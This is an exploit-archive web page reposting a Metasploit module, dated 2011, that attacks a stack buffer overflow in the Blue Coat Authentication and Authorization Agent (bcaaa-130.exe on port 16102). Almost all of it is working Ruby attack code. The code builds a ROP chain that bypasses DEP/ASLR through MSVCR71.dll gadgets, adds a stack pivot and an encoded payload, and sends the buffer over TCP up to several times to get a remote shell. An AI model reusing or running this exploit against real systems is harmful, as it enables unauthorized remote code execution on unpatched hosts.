首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2011-07-11  

##
# $Id: bcaaa_bof.rb 13137 2011-07-09 04:10:52Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::Tcp

 def initialize(info={})
  super(update_info(info,
   'Name'           => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",
   'Description'    => %q{
     This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),
    which comes as part of the Blue Coat Authentication proxy.  Please note that by default,
    this exploit will attempt up to three times in order to successfully gain remote code
    execution (in some cases, it takes as many as five times).  This can cause your activity
    to look even more suspicious.  To modify the number of exploit attempts, set the
    ATTEMPTS option.
   },
   'License'        => MSF_LICENSE,
   'Version'        => "$Revision: 13137 $",
   'Author'         =>
    [
     'Paul Harrington', # Initial discovery and PoC
     'Travis Warren',   # MSF Module with Universal DEP/ASLR bypass
     'sinn3r',          # More testing / reliability, plus minor changes
    ],
   'References'     =>
    [
     [ 'URL', 'https://kb.bluecoat.com/index?page=content&id=SA55' ],
     [ 'URL', 'http://seclists.org/bugtraq/2011/Jul/44' ],
    ],
   'Payload'        =>
    {
     'Space'    => 936,
     'BadChars' => "\x00",
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'BCAAA Version 5.4.6.1.54128', {} ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Apr 4 2011",
   'DefaultTarget'  => 0))

   register_options(
    [
     Opt::RPORT(16102),
     OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),
    ], self.class)
 end
 
 def junk
  return rand_text(4).unpack("L")[0].to_i
 end

 def exploit

  rop_gadgets = [
   # rop chain generated with mona.py
   0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
   0x7c37a140,  # Make EAX readable
   0x7c37591f,  # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
   junk,        # EBP (filler)
   0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
   0x7c37a140,  # <- *&VirtualProtect()
   0x7c3530ea,  # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
   0x7c346c0b,  # Slide, so next gadget would write to correct stack location
   0x7c376069,  # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
   junk,        # EDI (filler)
   junk,        # will be patched at runtime (VP), then picked up into ESI
   junk,        # EBX (filler)
   0x7c376402,  # POP EBP # RETN (msvcr71.dll)
   0x7c345c30,  # ptr to 'push esp #  ret ' (from MSVCR71.dll)
   0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
   0xfffffdff,  # size 0x00000201 -> ebx, modify if needed
   0x7c351e05,  # NEG EAX # RETN (MSVCR71.dll)
   0x7c354901,  # POP EBX # RETN (MSVCR71.dll)
   0xffffffff,  # pop value into ebx
   0x7c345255,  # INC EBX # FPATAN # RETN (MSVCR71.dll)
   0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
   0x7c34d201,  # POP ECX # RETN (MSVCR71.dll)
   0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)
   0x7c34b8d7,  # POP EDI # RETN (MSVCR71.dll)
   0x7c34b8d8,  # ROP NOP (-> edi)
   0x7c344f87,  # POP EDX # RETN (MSVCR71.dll)
   0xffffffc0,  # value to negate, target value : 0x00000040, target: edx
   0x7c351eb1,  # NEG EDX # RETN (MSVCR71.dll)
   0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
   0x90909090,  # NOPS (-> eax)
   0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
  ].pack("V*")

  pivot = [
   0x7C3410C4,  # RETN (MSVCR71.dll)
   0x1003800C,  # PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll)
   0x4241467D,  # EBP
   0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)
   0x7C3417D2,  # SUB EAX,EAX; RETN (MSVCR71.dll)
   0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)
   0x7C34f6C2,  # MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll)
   junk,        # EBX
   0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)
   0x5D02D0A0,  # SUB EBP,EAX; RETN (MSVCR70.dll)
   0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)
   0x7C3B5080,  # XCHG EAX,ESP; RETN (MSVCP71.dll)
  ].pack("V*")

  attempts = datastore['ATTEMPTS']

  #Sometimes a few attempts are needed to get a shell back (3 or 5 times)
  attempts.times do |i|
   #If we have a session on the box already, then we don't continue trying
   break if session_created?
   buffer =  rand_text(8)
   buffer << rop_gadgets
   buffer << payload.encoded
   buffer << 'EBAB'
   buffer << rand_text(8)
   buffer << pivot

   connect
   print_status("Sending request to #{rhost}. Attempt ##{(i+1).to_s}...")
   sock.put(buffer)
   handler
   select(nil, nil, nil, 2)
   disconnect
  end
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Blue Coat Authentication and A
·phpMyAdmin 3.x Swekey Remote C
·ZipItFast v3.0 .ZIP File Heap
·Freefloat FTP Server (LIST com
·ZipGenius v6.3.2.3000 .ZIP Fil
·phpMyAdmin3 (pma3) Remote Code
·ZipWiz 2005 v5.0 .ZIP File Buf
·Avaya IP Office Manager TFTP S
·ManageEngine ServiceDesk <= 8.
·Mozilla Firefox "nsTreeRange"
·DNS Invalid Compression Denial
·MicroP 0.1.1.1600 (MPPL File)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved